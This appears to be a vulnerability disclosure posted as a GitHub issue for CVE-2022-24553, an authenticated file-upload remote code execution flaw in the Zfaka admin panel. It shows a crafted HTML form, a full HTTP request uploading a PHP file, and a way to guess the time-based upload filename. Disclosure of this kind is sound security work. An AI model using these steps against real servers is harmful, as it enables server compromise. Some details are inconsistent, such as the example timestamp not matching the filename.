Headline
CVE-2022-24553: Zfaka Backend RCE(All version) · Issue #260 · zfaka-plus/zfaka
An issue was found in Zfaka <= 1.4.5. The verification of the background file upload function check is not strict, resulting in remote command execution.
in the background file upload, Zfaka only has one JS check in \public\res\layui\lay\modules\upload.js
there is no filtering for the file extension, and there is only one front-end JS verification, So disabling JS can directly implement the background rce
The controller of upload in the background is located in \application\modules\Admin\controllers\Products.php
The upload path will not be returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file
UPLOAD_ Path is defined as follows
define(‘UPLOAD_PATH’, APP_PATH.’/public/res/upload/’);
CUR_ Date is defined as follows
define('CUR_DATE’, date(‘Y-m-d’));
file name
$filename=date(“His”); // Hour + minute + second
Taking 21:05 as an example, the output results are as follows
Take 21:05:44 on May 26, 2021 as an example
The full file path is
http://www.xxx.com/res/upload/2021-05-26/210444.php
Construct form directly
<meta charset="utf-8">
<form action=" http://xxx.top/Admin/products/imgurlajax " method="post" enctype="multipart/form-data">
<label for="file">File:</label>
<input type="file" name="file" id="file" />
<input type="text" name="pid" id="pid" /> <–! Remember to modify the PID to the ID of the commodity (you can get it by selecting the commodity packet capture in the background) - > < / -! >
<input type="submit" value="Upload" />
</form>
At the same time, you need to add referers: http://xxx.top/Admin/products/imgurl/?id=1 , and modify the
Otherwise, “please select product ID” will be prompted
Finally, the complete upload HTTP request is as follows
POST http://xxx.top/Admin/products/imgurlajax HTTP/1.1
Host: xxxx
Content-Length: 291
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeSrhtSPGxub0H0eb
Origin: http://47.105.132.207
Referer: http://xxx.top/Admin/products/imgurl/?id=12
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh; q=0.9,en; q=0.8
Cookie: PHPSESSID=ql4ep5uk8cf9i0rvihrruuilaq
Connection: close
------WebKitFormBoundaryeSrhtSPGxub0H0eb
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png
<? php
phpinfo();
------WebKitFormBoundaryeSrhtSPGxub0H0eb
Content-Disposition: form-data; name="pid"
12
------WebKitFormBoundaryeSrhtSPGxub0H0eb–
Direct upload succeeded
Then run the last seconds with burpsuite intruder
After all, the number of seconds can’t be so accurate